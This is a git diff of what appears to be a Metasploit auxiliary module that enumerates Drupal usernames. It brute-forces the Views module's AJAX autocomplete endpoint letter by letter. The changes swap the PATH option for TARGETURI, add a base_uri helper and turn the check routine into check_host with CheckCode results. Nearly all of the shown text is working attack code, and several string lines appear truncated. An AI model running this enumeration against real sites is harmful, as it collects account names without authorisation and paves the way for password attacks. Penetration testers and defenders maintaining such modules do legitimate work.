@@ -35,43 +35,37 @@ module of Drupal, brute-forcing the first 10 usernames from 'a' to 'z'
3535
3636 register_options (
3737 [
38- OptString . new ( 'PATH ' , [ true , "Drupal Path" , "/" ] )
38+ OptString . new ( 'TARGETURI ' , [ true , "Drupal Path" , "/" ] )
3939 ] , self . class )
4040 end
4141
42- def check ( base_uri )
42+ def base_uri
43+ @base_uri ||= "#{ normalize_uri ( target_uri . path ) }
44+ end
45+
46+ def check_host ( ip )
4347 res = send_request_cgi ( {
4448 'uri' => base_uri ,
4549 'method' => 'GET' ,
4650 'headers' => { 'Connection' => 'Close' }
4751 } , 25 )
4852
4953 if not res
50- return false
54+ return Exploit :: CheckCode :: Unknown
5155 elsif res and res . body =~ /\< title\> Access denied/
5256 # This probably means the Views Module actually isn't installed
53- print_error ( "#{ rhost } )
54- return false
57+ vprint_error ( "#{ rhost } )
58+ return Exploit :: CheckCode :: Safe
5559 elsif res and res . message != 'OK' or res . body != '[ ]'
56- return false
60+ return Exploit :: CheckCode :: Safe
5761 else
58- return true
62+ return Exploit :: CheckCode :: Appears
5963 end
6064 end
6165
6266 def run_host ( ip )
63- # Make sure the URIPATH begins with '/'
64- datastore [ 'PATH' ] = normalize_uri ( datastore [ 'PATH' ] )
65-
66- # Make sure the URIPATH ends with /
67- if datastore [ 'PATH' ] [ -1 , 1 ] != '/'
68- datastore [ 'PATH' ] = datastore [ 'PATH' ] + '/'
69- end
70-
71- enum_uri = datastore [ 'PATH' ] + "?q=admin/views/ajax/autocomplete/user/"
72-
7367 # Check if remote host is available or appears vulnerable
74- if not check ( enum_uri )
68+ unless check_host ( ip ) == Exploit :: CheckCode :: Appears
7569 print_error ( "#{ ip } )
7670 return
7771 end
@@ -83,7 +77,7 @@ def run_host(ip)
8377 vprint_status ( "Iterating on letter: #{ l } )
8478
8579 res = send_request_cgi ( {
86- 'uri' => enum_uri +l ,
80+ 'uri' => base_uri +l ,
8781 'method' => 'GET' ,
8882 'headers' => { 'Connection' => 'Close' }
8983 } , 25 )
0 commit comments